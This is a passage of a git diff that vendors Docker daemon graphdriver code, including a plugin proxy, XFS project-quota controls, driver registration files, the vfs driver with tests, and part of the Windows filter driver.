&graphDriverRequest{} + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Status", args, &ret); err != nil { + return nil + } + return ret.Status +} + +func (d *graphDriverProxy) GetMetadata(id string) (map[string]string, error) { + args := &graphDriverRequest{ + ID: id, + } + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.GetMetadata", args, &ret); err != nil { + return nil, err + } + if ret.Err != "" { + return nil, errors.New(ret.Err) + } + return ret.Metadata, nil +} + +func (d *graphDriverProxy) Cleanup() error { + if !d.p.IsV1() { + if cp, ok := d.p.(plugingetter.CountedPlugin); ok { + // always release + defer cp.Release() + } + } + + args := &graphDriverRequest{} + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Cleanup", args, &ret); err != nil { + return nil + } + if ret.Err != "" { + return errors.New(ret.Err) + } + return nil +} + +func (d *graphDriverProxy) Diff(id, parent string) (io.ReadCloser, error) { + args := &graphDriverRequest{ + ID: id, + Parent: parent, + } + body, err := d.p.Client().Stream("GraphDriver.Diff", args) + if err != nil { + return nil, err + } + return body, nil +} + +func (d *graphDriverProxy) Changes(id, parent string) ([]archive.Change, error) { + args := &graphDriverRequest{ + ID: id, + Parent: parent, + } + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Changes", args, &ret); err != nil { + return nil, err + } + if ret.Err != "" { + return nil, errors.New(ret.Err) + } + + return ret.Changes, nil +} + +func (d *graphDriverProxy) ApplyDiff(id, parent string, diff io.Reader) (int64, error) { + var ret graphDriverResponse + if err := d.p.Client().SendFile(fmt.Sprintf("GraphDriver.ApplyDiff?id=%s&parent=%s", id, parent), diff, &ret); err != nil { + return -1, err + } + if ret.Err != "" { + return -1, errors.New(ret.Err) + } + return ret.Size, nil +} + +func (d *graphDriverProxy) DiffSize(id, parent string) (int64, error) { + args := 
&graphDriverRequest{ + ID: id, + Parent: parent, + } + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.DiffSize", args, &ret); err != nil { + return -1, err + } + if ret.Err != "" { + return -1, errors.New(ret.Err) + } + return ret.Size, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go new file mode 100644 index 0000000000..e408d5f906 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go @@ -0,0 +1,339 @@ +// +build linux + +// +// projectquota.go - implements XFS project quota controls +// for setting quota limits on a newly created directory. +// It currently supports the legacy XFS specific ioctls. +// +// TODO: use generic quota control ioctl FS_IOC_FS{GET,SET}XATTR +// for both xfs/ext4 for kernel version >= v4.5 +// + +package quota + +/* +#include +#include +#include +#include +#include + +#ifndef FS_XFLAG_PROJINHERIT +struct fsxattr { + __u32 fsx_xflags; + __u32 fsx_extsize; + __u32 fsx_nextents; + __u32 fsx_projid; + unsigned char fsx_pad[12]; +}; +#define FS_XFLAG_PROJINHERIT 0x00000200 +#endif +#ifndef FS_IOC_FSGETXATTR +#define FS_IOC_FSGETXATTR _IOR ('X', 31, struct fsxattr) +#endif +#ifndef FS_IOC_FSSETXATTR +#define FS_IOC_FSSETXATTR _IOW ('X', 32, struct fsxattr) +#endif + +#ifndef PRJQUOTA +#define PRJQUOTA 2 +#endif +#ifndef XFS_PROJ_QUOTA +#define XFS_PROJ_QUOTA 2 +#endif +#ifndef Q_XSETPQLIM +#define Q_XSETPQLIM QCMD(Q_XSETQLIM, PRJQUOTA) +#endif +#ifndef Q_XGETPQUOTA +#define Q_XGETPQUOTA QCMD(Q_XGETQUOTA, PRJQUOTA) +#endif +*/ +import "C" +import ( + "fmt" + "io/ioutil" + "os" + "path" + "path/filepath" + "syscall" + "unsafe" + + "github.com/Sirupsen/logrus" +) + +// Quota limit params - currently we only control blocks hard limit +type Quota struct { + Size uint64 +} + +// Control - Context to be used by storage driver (e.g. 
overlay) +// who wants to apply project quotas to container dirs +type Control struct { + backingFsBlockDev string + nextProjectID uint32 + quotas map[string]uint32 +} + +// NewControl - initialize project quota support. +// Test to make sure that quota can be set on a test dir and find +// the first project id to be used for the next container create. +// +// Returns nil (and error) if project quota is not supported. +// +// First get the project id of the home directory. +// This test will fail if the backing fs is not xfs. +// +// xfs_quota tool can be used to assign a project id to the driver home directory, e.g.: +// echo 999:/var/lib/docker/overlay2 >> /etc/projects +// echo docker:999 >> /etc/projid +// xfs_quota -x -c 'project -s docker' / +// +// In that case, the home directory project id will be used as a "start offset" +// and all containers will be assigned larger project ids (e.g. >= 1000). +// This is a way to prevent xfs_quota management from conflicting with docker. +// +// Then try to create a test directory with the next project id and set a quota +// on it. If that works, continue to scan existing containers to map allocated +// project ids. 
+// +func NewControl(basePath string) (*Control, error) { + // + // Get project id of parent dir as minimal id to be used by driver + // + minProjectID, err := getProjectID(basePath) + if err != nil { + return nil, err + } + minProjectID++ + + // + // create backing filesystem device node + // + backingFsBlockDev, err := makeBackingFsDev(basePath) + if err != nil { + return nil, err + } + + // + // Test if filesystem supports project quotas by trying to set + // a quota on the first available project id + // + quota := Quota{ + Size: 0, + } + if err := setProjectQuota(backingFsBlockDev, minProjectID, quota); err != nil { + return nil, err + } + + q := Control{ + backingFsBlockDev: backingFsBlockDev, + nextProjectID: minProjectID + 1, + quotas: make(map[string]uint32), + } + + // + // get first project id to be used for next container + // + err = q.findNextProjectID(basePath) + if err != nil { + return nil, err + } + + logrus.Debugf("NewControl(%s): nextProjectID = %d", basePath, q.nextProjectID) + return &q, nil +} + +// SetQuota - assign a unique project id to directory and set the quota limits +// for that project id +func (q *Control) SetQuota(targetPath string, quota Quota) error { + + projectID, ok := q.quotas[targetPath] + if !ok { + projectID = q.nextProjectID + + // + // assign project id to new container directory + // + err := setProjectID(targetPath, projectID) + if err != nil { + return err + } + + q.quotas[targetPath] = projectID + q.nextProjectID++ + } + + // + // set the quota limit for the container's project id + // + logrus.Debugf("SetQuota(%s, %d): projectID=%d", targetPath, quota.Size, projectID) + return setProjectQuota(q.backingFsBlockDev, projectID, quota) +} + +// setProjectQuota - set the quota for project id on xfs block device +func setProjectQuota(backingFsBlockDev string, projectID uint32, quota Quota) error { + var d C.fs_disk_quota_t + d.d_version = C.FS_DQUOT_VERSION + d.d_id = C.__u32(projectID) + d.d_flags = C.XFS_PROJ_QUOTA + + 
d.d_fieldmask = C.FS_DQ_BHARD | C.FS_DQ_BSOFT + d.d_blk_hardlimit = C.__u64(quota.Size / 512) + d.d_blk_softlimit = d.d_blk_hardlimit + + var cs = C.CString(backingFsBlockDev) + defer C.free(unsafe.Pointer(cs)) + + _, _, errno := syscall.Syscall6(syscall.SYS_QUOTACTL, C.Q_XSETPQLIM, + uintptr(unsafe.Pointer(cs)), uintptr(d.d_id), + uintptr(unsafe.Pointer(&d)), 0, 0) + if errno != 0 { + return fmt.Errorf("Failed to set quota limit for projid %d on %s: %v", + projectID, backingFsBlockDev, errno.Error()) + } + + return nil +} + +// GetQuota - get the quota limits of a directory that was configured with SetQuota +func (q *Control) GetQuota(targetPath string, quota *Quota) error { + + projectID, ok := q.quotas[targetPath] + if !ok { + return fmt.Errorf("quota not found for path : %s", targetPath) + } + + // + // get the quota limit for the container's project id + // + var d C.fs_disk_quota_t + + var cs = C.CString(q.backingFsBlockDev) + defer C.free(unsafe.Pointer(cs)) + + _, _, errno := syscall.Syscall6(syscall.SYS_QUOTACTL, C.Q_XGETPQUOTA, + uintptr(unsafe.Pointer(cs)), uintptr(C.__u32(projectID)), + uintptr(unsafe.Pointer(&d)), 0, 0) + if errno != 0 { + return fmt.Errorf("Failed to get quota limit for projid %d on %s: %v", + projectID, q.backingFsBlockDev, errno.Error()) + } + quota.Size = uint64(d.d_blk_hardlimit) * 512 + + return nil +} + +// getProjectID - get the project id of path on xfs +func getProjectID(targetPath string) (uint32, error) { + dir, err := openDir(targetPath) + if err != nil { + return 0, err + } + defer closeDir(dir) + + var fsx C.struct_fsxattr + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR, + uintptr(unsafe.Pointer(&fsx))) + if errno != 0 { + return 0, fmt.Errorf("Failed to get projid for %s: %v", targetPath, errno.Error()) + } + + return uint32(fsx.fsx_projid), nil +} + +// setProjectID - set the project id of path on xfs +func setProjectID(targetPath string, projectID uint32) error { + dir, err := 
openDir(targetPath) + if err != nil { + return err + } + defer closeDir(dir) + + var fsx C.struct_fsxattr + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR, + uintptr(unsafe.Pointer(&fsx))) + if errno != 0 { + return fmt.Errorf("Failed to get projid for %s: %v", targetPath, errno.Error()) + } + fsx.fsx_projid = C.__u32(projectID) + fsx.fsx_xflags |= C.FS_XFLAG_PROJINHERIT + _, _, errno = syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSSETXATTR, + uintptr(unsafe.Pointer(&fsx))) + if errno != 0 { + return fmt.Errorf("Failed to set projid for %s: %v", targetPath, errno.Error()) + } + + return nil +} + +// findNextProjectID - find the next project id to be used for containers +// by scanning driver home directory to find used project ids +func (q *Control) findNextProjectID(home string) error { + files, err := ioutil.ReadDir(home) + if err != nil { + return fmt.Errorf("read directory failed : %s", home) + } + for _, file := range files { + if !file.IsDir() { + continue + } + path := filepath.Join(home, file.Name()) + projid, err := getProjectID(path) + if err != nil { + return err + } + if projid > 0 { + q.quotas[path] = projid + } + if q.nextProjectID <= projid { + q.nextProjectID = projid + 1 + } + } + + return nil +} + +func free(p *C.char) { + C.free(unsafe.Pointer(p)) +} + +func openDir(path string) (*C.DIR, error) { + Cpath := C.CString(path) + defer free(Cpath) + + dir := C.opendir(Cpath) + if dir == nil { + return nil, fmt.Errorf("Can't open dir") + } + return dir, nil +} + +func closeDir(dir *C.DIR) { + if dir != nil { + C.closedir(dir) + } +} + +func getDirFd(dir *C.DIR) uintptr { + return uintptr(C.dirfd(dir)) +} + +// Get the backing block device of the driver home directory +// and create a block device node under the home directory +// to be used by quotactl commands +func makeBackingFsDev(home string) (string, error) { + fileinfo, err := os.Stat(home) + if err != nil { + return "", err + } + + 
backingFsBlockDev := path.Join(home, "backingFsBlockDev") + // Re-create just in case someone copied the home directory over to a new device + syscall.Unlink(backingFsBlockDev) + stat := fileinfo.Sys().(*syscall.Stat_t) + if err := syscall.Mknod(backingFsBlockDev, syscall.S_IFBLK|0600, int(stat.Dev)); err != nil { + return "", fmt.Errorf("Failed to mknod %s: %v", backingFsBlockDev, err) + } + + return backingFsBlockDev, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go new file mode 100644 index 0000000000..262954d6e3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go @@ -0,0 +1,8 @@ +// +build !exclude_graphdriver_aufs,linux + +package register + +import ( + // register the aufs graphdriver + _ "github.com/docker/docker/daemon/graphdriver/aufs" +) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go new file mode 100644 index 0000000000..f456cc5ce5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go @@ -0,0 +1,8 @@ +// +build !exclude_graphdriver_btrfs,linux + +package register + +import ( + // register the btrfs graphdriver + _ "github.com/docker/docker/daemon/graphdriver/btrfs" +) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go new file mode 100644 index 0000000000..bb2e9ef541 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go @@ -0,0 +1,8 @@ +// +build !exclude_graphdriver_devicemapper,linux + +package register + +import ( + // register the devmapper graphdriver + _ "github.com/docker/docker/daemon/graphdriver/devmapper" +) diff --git 
a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go new file mode 100644 index 0000000000..9ba849cedc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go @@ -0,0 +1,9 @@ +// +build !exclude_graphdriver_overlay,linux + +package register + +import ( + // register the overlay graphdriver + _ "github.com/docker/docker/daemon/graphdriver/overlay" + _ "github.com/docker/docker/daemon/graphdriver/overlay2" +) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go new file mode 100644 index 0000000000..98fad23b20 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go @@ -0,0 +1,6 @@ +package register + +import ( + // register vfs + _ "github.com/docker/docker/daemon/graphdriver/vfs" +) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go new file mode 100644 index 0000000000..efaa5005ed --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go @@ -0,0 +1,6 @@ +package register + +import ( + // register the windows graph driver + _ "github.com/docker/docker/daemon/graphdriver/windows" +) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go new file mode 100644 index 0000000000..8f34e35537 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go @@ -0,0 +1,8 @@ +// +build !exclude_graphdriver_zfs,linux !exclude_graphdriver_zfs,freebsd, solaris + +package register + +import ( + // register the zfs driver + _ "github.com/docker/docker/daemon/graphdriver/zfs" 
+) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go new file mode 100644 index 0000000000..8832d11531 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go @@ -0,0 +1,145 @@ +package vfs + +import ( + "fmt" + "os" + "path/filepath" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/idtools" + + "github.com/opencontainers/runc/libcontainer/label" +) + +var ( + // CopyWithTar defines the copy method to use. + CopyWithTar = chrootarchive.CopyWithTar +) + +func init() { + graphdriver.Register("vfs", Init) +} + +// Init returns a new VFS driver. +// This sets the home directory for the driver and returns NaiveDiffDriver. +func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + d := &Driver{ + home: home, + uidMaps: uidMaps, + gidMaps: gidMaps, + } + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err != nil { + return nil, err + } + if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil { + return nil, err + } + return graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps), nil +} + +// Driver holds information about the driver, home directory of the driver. +// Driver implements graphdriver.ProtoDriver. It uses only basic vfs operations. +// In order to support layering, files are copied from the parent layer into the new layer. There is no copy-on-write support. +// Driver must be wrapped in NaiveDiffDriver to be used as a graphdriver.Driver +type Driver struct { + home string + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap +} + +func (d *Driver) String() string { + return "vfs" +} + +// Status is used for implementing the graphdriver.ProtoDriver interface. VFS does not currently have any status information. 
+func (d *Driver) Status() [][2]string { + return nil +} + +// GetMetadata is used for implementing the graphdriver.ProtoDriver interface. VFS does not currently have any meta data. +func (d *Driver) GetMetadata(id string) (map[string]string, error) { + return nil, nil +} + +// Cleanup is used to implement graphdriver.ProtoDriver. There is no cleanup required for this driver. +func (d *Driver) Cleanup() error { + return nil +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. +func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + return d.Create(id, parent, opts) +} + +// Create prepares the filesystem for the VFS driver and copies the directory for the given id under the parent. +func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + if opts != nil && len(opts.StorageOpt) != 0 { + return fmt.Errorf("--storage-opt is not supported for vfs") + } + + dir := d.dir(id) + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return err + } + if err := idtools.MkdirAllAs(filepath.Dir(dir), 0700, rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(dir, 0755, rootUID, rootGID); err != nil { + return err + } + labelOpts := []string{"level:s0"} + if _, mountLabel, err := label.InitLabels(labelOpts); err == nil { + label.SetFileLabel(dir, mountLabel) + } + if parent == "" { + return nil + } + parentDir, err := d.Get(parent, "") + if err != nil { + return fmt.Errorf("%s: %s", parent, err) + } + if err := CopyWithTar(parentDir, dir); err != nil { + return err + } + return nil +} + +func (d *Driver) dir(id string) string { + return filepath.Join(d.home, "dir", filepath.Base(id)) +} + +// Remove deletes the content from the directory for a given id. 
+func (d *Driver) Remove(id string) error { + if err := os.RemoveAll(d.dir(id)); err != nil && !os.IsNotExist(err) { + return err + } + return nil +} + +// Get returns the directory for the given id. +func (d *Driver) Get(id, mountLabel string) (string, error) { + dir := d.dir(id) + if st, err := os.Stat(dir); err != nil { + return "", err + } else if !st.IsDir() { + return "", fmt.Errorf("%s: not a directory", dir) + } + return dir, nil +} + +// Put is a noop for vfs that return nil for the error, since this driver has no runtime resources to clean up. +func (d *Driver) Put(id string) error { + // The vfs driver has no runtime resources (e.g. mounts) + // to clean up, so we don't need anything here + return nil +} + +// Exists checks to see if the directory exists for the given id. +func (d *Driver) Exists(id string) bool { + _, err := os.Stat(d.dir(id)) + return err == nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go new file mode 100644 index 0000000000..9ecf21dbaa --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go @@ -0,0 +1,37 @@ +// +build linux + +package vfs + +import ( + "testing" + + "github.com/docker/docker/daemon/graphdriver/graphtest" + + "github.com/docker/docker/pkg/reexec" +) + +func init() { + reexec.Init() +} + +// This avoids creating a new driver for each test if all tests are run +// Make sure to put new tests between TestVfsSetup and TestVfsTeardown +func TestVfsSetup(t *testing.T) { + graphtest.GetDriver(t, "vfs") +} + +func TestVfsCreateEmpty(t *testing.T) { + graphtest.DriverTestCreateEmpty(t, "vfs") +} + +func TestVfsCreateBase(t *testing.T) { + graphtest.DriverTestCreateBase(t, "vfs") +} + +func TestVfsCreateSnap(t *testing.T) { + graphtest.DriverTestCreateSnap(t, "vfs") +} + +func TestVfsTeardown(t *testing.T) { + graphtest.PutDriver(t) +} diff --git 
a/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go new file mode 100644 index 0000000000..beac93ae75 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go @@ -0,0 +1,886 @@ +//+build windows + +package windows + +import ( + "bufio" + "bytes" + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "path" + "path/filepath" + "strconv" + "strings" + "sync" + "syscall" + "time" + "unsafe" + + "github.com/Microsoft/go-winio" + "github.com/Microsoft/go-winio/archive/tar" + "github.com/Microsoft/go-winio/backuptar" + "github.com/Microsoft/hcsshim" + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/longpath" + "github.com/docker/docker/pkg/reexec" + units "github.com/docker/go-units" + "golang.org/x/sys/windows" +) + +// filterDriver is an HCSShim driver type for the Windows Filter driver. +const filterDriver = 1 + +var ( + // mutatedFiles is a list of files that are mutated by the import process + // and must be backed up and restored. + mutatedFiles = map[string]string{ + "UtilityVM/Files/EFI/Microsoft/Boot/BCD": "bcd.bak", + "UtilityVM/Files/EFI/Microsoft/Boot/BCD.LOG": "bcd.log.bak", + "UtilityVM/Files/EFI/Microsoft/Boot/BCD.LOG1": "bcd.log1.bak", + "UtilityVM/Files/EFI/Microsoft/Boot/BCD.LOG2": "bcd.log2.bak", + } + noreexec = false +) + +// init registers the windows graph drivers to the register. +func init() { + graphdriver.Register("windowsfilter", InitFilter) + // DOCKER_WINDOWSFILTER_NOREEXEC allows for inline processing which makes + // debugging issues in the re-exec codepath significantly easier. + if os.Getenv("DOCKER_WINDOWSFILTER_NOREEXEC") != "" { + logrus.Warnf("WindowsGraphDriver is set to not re-exec. 
This is intended for debugging purposes only.") + noreexec = true + } else { + reexec.Register("docker-windows-write-layer", writeLayerReexec) + } +} + +type checker struct { +} + +func (c *checker) IsMounted(path string) bool { + return false +} + +// Driver represents a windows graph driver. +type Driver struct { + // info stores the shim driver information + info hcsshim.DriverInfo + ctr *graphdriver.RefCounter + // it is safe for windows to use a cache here because it does not support + // restoring containers when the daemon dies. + cacheMu sync.Mutex + cache map[string]string +} + +// InitFilter returns a new Windows storage filter driver. +func InitFilter(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + logrus.Debugf("WindowsGraphDriver InitFilter at %s", home) + + fsType, err := getFileSystemType(string(home[0])) + if err != nil { + return nil, err + } + if strings.ToLower(fsType) == "refs" { + return nil, fmt.Errorf("%s is on an ReFS volume - ReFS volumes are not supported", home) + } + + d := &Driver{ + info: hcsshim.DriverInfo{ + HomeDir: home, + Flavour: filterDriver, + }, + cache: make(map[string]string), + ctr: graphdriver.NewRefCounter(&checker{}), + } + return d, nil +} + +// win32FromHresult is a helper function to get the win32 error code from an HRESULT +func win32FromHresult(hr uintptr) uintptr { + if hr&0x1fff0000 == 0x00070000 { + return hr & 0xffff + } + return hr +} + +// getFileSystemType obtains the type of a file system through GetVolumeInformation +// https://msdn.microsoft.com/en-us/library/windows/desktop/aa364993(v=vs.85).aspx +func getFileSystemType(drive string) (fsType string, hr error) { + var ( + modkernel32 = windows.NewLazySystemDLL("kernel32.dll") + procGetVolumeInformation = modkernel32.NewProc("GetVolumeInformationW") + buf = make([]uint16, 255) + size = syscall.MAX_PATH + 1 + ) + if len(drive) != 1 { + hr = errors.New("getFileSystemType must be called with a drive letter") + 
return + } + drive += `:\` + n := uintptr(unsafe.Pointer(nil)) + r0, _, _ := syscall.Syscall9(procGetVolumeInformation.Addr(), 8, uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(drive))), n, n, n, n, n, uintptr(unsafe.Pointer(&buf[0])), uintptr(size), 0) + if int32(r0) < 0 { + hr = syscall.Errno(win32FromHresult(r0)) + } + fsType = syscall.UTF16ToString(buf) + return +} + +// String returns the string representation of a driver. This should match +// the name the graph driver has been registered with. +func (d *Driver) String() string { + return "windowsfilter" +} + +// Status returns the status of the driver. +func (d *Driver) Status() [][2]string { + return [][2]string{ + {"Windows", ""}, + } +} + +// Exists returns true if the given id is registered with this driver. +func (d *Driver) Exists(id string) bool { + rID, err := d.resolveID(id) + if err != nil { + return false + } + result, err := hcsshim.LayerExists(d.info, rID) + if err != nil { + return false + } + return result +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. +func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + if opts != nil { + return d.create(id, parent, opts.MountLabel, false, opts.StorageOpt) + } + return d.create(id, parent, "", false, nil) +} + +// Create creates a new read-only layer with the given id. 
+func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + if opts != nil { + return d.create(id, parent, opts.MountLabel, true, opts.StorageOpt) + } + return d.create(id, parent, "", true, nil) +} + +func (d *Driver) create(id, parent, mountLabel string, readOnly bool, storageOpt map[string]string) error { + rPId, err := d.resolveID(parent) + if err != nil { + return err + } + + parentChain, err := d.getLayerChain(rPId) + if err != nil { + return err + } + + var layerChain []string + + if rPId != "" { + parentPath, err := hcsshim.GetLayerMountPath(d.info, rPId) + if err != nil { + return err + } + if _, err := os.Stat(filepath.Join(parentPath, "Files")); err == nil { + // This is a legitimate parent layer (not the empty "-init" layer), + // so include it in the layer chain. + layerChain = []string{parentPath} + } + } + + layerChain = append(layerChain, parentChain...) + + if readOnly { + if err := hcsshim.CreateLayer(d.info, id, rPId); err != nil { + return err + } + } else { + var parentPath string + if len(layerChain) != 0 { + parentPath = layerChain[0] + } + + if err := hcsshim.CreateSandboxLayer(d.info, id, parentPath, layerChain); err != nil { + return err + } + + storageOptions, err := parseStorageOpt(storageOpt) + if err != nil { + return fmt.Errorf("Failed to parse storage options - %s", err) + } + + if storageOptions.size != 0 { + if err := hcsshim.ExpandSandboxSize(d.info, id, storageOptions.size); err != nil { + return err + } + } + } + + if _, err := os.Lstat(d.dir(parent)); err != nil { + if err2 := hcsshim.DestroyLayer(d.info, id); err2 != nil { + logrus.Warnf("Failed to DestroyLayer %s: %s", id, err2) + } + return fmt.Errorf("Cannot create layer with missing parent %s: %s", parent, err) + } + + if err := d.setLayerChain(id, layerChain); err != nil { + if err2 := hcsshim.DestroyLayer(d.info, id); err2 != nil { + logrus.Warnf("Failed to DestroyLayer %s: %s", id, err2) + } + return err + } + + return nil +} + +// dir returns 
the absolute path to the layer. +func (d *Driver) dir(id string) string { + return filepath.Join(d.info.HomeDir, filepath.Base(id)) +} + +// Remove unmounts and removes the dir information. +func (d *Driver) Remove(id string) error { + rID, err := d.resolveID(id) + if err != nil { + return err + } + + // This retry loop is due to a bug in Windows (Internal bug #9432268) + // if GetContainers fails with ErrVmcomputeOperationInvalidState + // it is a transient error. Retry until it succeeds. + var computeSystems []hcsshim.ContainerProperties + retryCount := 0 + for { + // Get and terminate any template VMs that are currently using the layer + computeSystems, err = hcsshim.GetContainers(hcsshim.ComputeSystemQuery{}) + if err != nil { + if err == hcsshim.ErrVmcomputeOperationInvalidState { + if retryCount >= 5 { + // If we are unable to get the list of containers + // go ahead and attempt to delete the layer anyway + // as it will most likely work. + break + } + retryCount++ + time.Sleep(2 * time.Second) + continue + } + return err + } + break + } + + for _, computeSystem := range computeSystems { + if strings.Contains(computeSystem.RuntimeImagePath, id) && computeSystem.IsRuntimeTemplate { + container, err := hcsshim.OpenContainer(computeSystem.ID) + if err != nil { + return err + } + defer container.Close() + err = container.Terminate() + if hcsshim.IsPending(err) { + err = container.Wait() + } else if hcsshim.IsAlreadyStopped(err) { + err = nil + } + + if err != nil { + return err + } + } + } + + layerPath := filepath.Join(d.info.HomeDir, rID) + tmpID := fmt.Sprintf("%s-removing", rID) + tmpLayerPath := filepath.Join(d.info.HomeDir, tmpID) + if err := os.Rename(layerPath, tmpLayerPath); err != nil && !os.IsNotExist(err) { + return err + } + if err := hcsshim.DestroyLayer(d.info, tmpID); err != nil { + logrus.Errorf("Failed to DestroyLayer %s: %s", id, err) + } + + return nil +} + +// Get returns the rootfs path for the id. This will mount the dir at its given path. 
+func (d *Driver) Get(id, mountLabel string) (string, error) { + logrus.Debugf("WindowsGraphDriver Get() id %s mountLabel %s", id, mountLabel) + var dir string + + rID, err := d.resolveID(id) + if err != nil { + return "", err + } + if count := d.ctr.Increment(rID); count > 1 { + return d.cache[rID], nil + } + + // Getting the layer paths must be done outside of the lock. + layerChain, err := d.getLayerChain(rID) + if err != nil { + d.ctr.Decrement(rID) + return "", err + } + + if err := hcsshim.ActivateLayer(d.info, rID); err != nil { + d.ctr.Decrement(rID) + return "", err + } + if err := hcsshim.PrepareLayer(d.info, rID, layerChain); err != nil { + d.ctr.Decrement(rID) + if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil { + logrus.Warnf("Failed to Deactivate %s: %s", id, err) + } + return "", err + } + + mountPath, err := hcsshim.GetLayerMountPath(d.info, rID) + if err != nil { + d.ctr.Decrement(rID) + if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil { + logrus.Warnf("Failed to Deactivate %s: %s", id, err) + } + return "", err + } + d.cacheMu.Lock() + d.cache[rID] = mountPath + d.cacheMu.Unlock() + + // If the layer has a mount path, use that. Otherwise, use the + // folder path. + if mountPath != "" { + dir = mountPath + } else { + dir = d.dir(id) + } + + return dir, nil +} + +// Put adds a new layer to the driver. +func (d *Driver) Put(id string) error { + logrus.Debugf("WindowsGraphDriver Put() id %s", id) + + rID, err := d.resolveID(id) + if err != nil { + return err + } + if count := d.ctr.Decrement(rID); count > 0 { + return nil + } + d.cacheMu.Lock() + delete(d.cache, rID) + d.cacheMu.Unlock() + + if err := hcsshim.UnprepareLayer(d.info, rID); err != nil { + return err + } + return hcsshim.DeactivateLayer(d.info, rID) +} + +// Cleanup ensures the information the driver stores is properly removed. 
+func (d *Driver) Cleanup() error { + return nil +} + +// Diff produces an archive of the changes between the specified +// layer and its parent layer which may be "". +// The layer should be mounted when calling this function +func (d *Driver) Diff(id, parent string) (_ io.ReadCloser, err error) { + rID, err := d.resolveID(id) + if err != nil { + return + } + + layerChain, err := d.getLayerChain(rID) + if err != nil { + return + } + + // this is assuming that the layer is unmounted + if err := hcsshim.UnprepareLayer(d.info, rID); err != nil { + return nil, err + } + prepare := func() { + if err := hcsshim.PrepareLayer(d.info, rID, layerChain); err != nil { + logrus.Warnf("Failed to Deactivate %s: %s", rID, err) + } + } + + arch, err := d.exportLayer(rID, layerChain) + if err != nil { + prepare() + return + } + return ioutils.NewReadCloserWrapper(arch, func() error { + err := arch.Close() + prepare() + return err + }), nil +} + +// Changes produces a list of changes between the specified layer +// and its parent layer. If parent is "", then all changes will be ADD changes. +// The layer should not be mounted when calling this function. 
